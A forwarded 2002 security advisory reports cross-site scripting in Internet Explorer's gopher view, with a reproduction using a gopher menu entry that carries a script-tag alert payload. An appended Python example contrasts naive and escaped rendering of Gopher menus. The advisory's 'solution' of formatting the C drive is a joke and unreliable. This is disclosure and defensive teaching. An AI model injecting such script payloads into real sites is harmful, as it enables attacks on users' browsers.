[Fwd: IE gopher cross site scripting]
From: KF (dotslashat_private)
Date: Sun Jun 16 2002 - 20:17:19 PDT
Not sure why but I can't seem to get this message through to the lists...
-KF
attached mail follows:
======================================================================
Strategic Reconnaissance Team Security Advisory (SRT2002-06-16-0314)
Topic : IE gopher view Cross Site Scripting
Date : June 16, 2002
Credit : KF dotslash[at]snosoft.com
Site : http://www.snosoft.com
======================================================================
.: Description:
---------------
Internet Explorer 5 (and others?) allows cross site scripting in gopher
view. This is currently the least of your worries with gopher but it
may still pose a threat.
.: Impact:
----------
The usual cross site scripting attack consequences are subject here.
Your script must fit into a finite amount of character space or it
will be truncated thus making it fail.
In order to duplicate this attack I used gn gopherd on my linux box.
I made a malicious .cache file as shown below in order to exploit
the browser.
[root@localhost dir]# cat menu
Name=<script>alert('When can we see the source code bill?')</script>
Path=0/hrmm
Type=0
Host=10.0.1.234
Port=70
[root@localhost dir]# /root/gn-2.25-DEV/mkcache/mkcache
Warning: Unable to open mime type file:
/path/to/src/mkcache/gn_mime.types
Using defaults.
Writing cache file ./.cache
next open the link gopher://10.0.1.234/1
voila, javascript alert with extra cheese.
.: Systems Affected:
--------------------
Microsoft based machines with unknown versions of IExplorer.
.: Solution:
------------
Step 1.) Ask your vendor for the source code so that you can make your
own patch. Oh wait that would make you an "open source terrorist".
Step 2.) In the event that step one fails please format your c drive.
======================================================================
-KF
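The defect the advisory describes is a client that drops the display name of a Gopher menu item into its HTML view unescaped. The following is an added example, not code from the original post and not Internet Explorer's rendering code: a small parser for RFC 1436 menu lines, with a naive renderer beside an escaped one so the difference is visible. The menu text is constructed; its first item's display name mirrors the advisory's menu entry, and the function names are the example's own.

```python
"""Rendering a Gopher menu as HTML: naive interpolation vs. context-aware escaping."""
import html
from urllib.parse import quote

# Constructed sample in RFC 1436 wire format:
# <type><display name> TAB <selector> TAB <host> TAB <port> CRLF, terminated by "."
# The first item's display name mirrors the advisory's menu entry.
SAMPLE_MENU = (
    "0<script>alert('When can we see the source code bill?')</script>\t0/hrmm\t10.0.1.234\t70\r\n"
    "1Some directory\t1/dir\t10.0.1.234\t70\r\n"
    "iAn informational line\tfake\t(NULL)\t0\r\n"
    ".\r\n"
)


def parse_menu(raw):
    """Parse menu lines into dicts; stop at the '.' terminator, skip malformed lines."""
    items = []
    for line in raw.split("\r\n"):
        if line == ".":
            break
        if not line:
            continue
        fields = line.split("\t")
        if len(fields) < 4:
            continue  # malformed line: skip rather than guess at fields
        item_type, name = fields[0][:1], fields[0][1:]
        items.append({
            "type": item_type,
            "name": name,
            "selector": fields[1],
            "host": fields[2],
            "port": fields[3],
        })
    return items


def render_naive(items):
    """Vulnerable rendering: server-controlled display names land in HTML verbatim."""
    return "\n".join(
        f'<a href="gopher://{i["host"]}:{i["port"]}/{i["type"]}{i["selector"]}">{i["name"]}</a>'
        for i in items
    )


def render_escaped(items):
    """Hardened rendering: every server-controlled field is escaped for its context."""
    out = []
    for i in items:
        name = html.escape(i["name"], quote=True)  # text context: escape <, >, &, quotes
        if i["type"] == "i":
            out.append(f"<span>{name}</span>")  # informational lines are not links
            continue
        # The host must look like a hostname or address and the port must be numeric;
        # anything else is rendered as plain text instead of becoming a link target.
        if not i["port"].isdigit() or any(c in i["host"] for c in '"<>/ '):
            out.append(f"<span>{name}</span>")
            continue
        href = f'gopher://{i["host"]}:{i["port"]}/{i["type"]}{quote(i["selector"], safe="/")}'
        out.append(f'<a href="{html.escape(href, quote=True)}">{name}</a>')
    return "\n".join(out)


if __name__ == "__main__":
    parsed = parse_menu(SAMPLE_MENU)
    print("--- naive ---")
    print(render_naive(parsed))
    print("--- escaped ---")
    print(render_escaped(parsed))
```

The naive renderer reproduces the advisory's symptom: the first item's name arrives as live markup. The escaped renderer treats the display name as text and the selector, host and port as URL components, which is the fix a browser needs regardless of how short the injected string has to be.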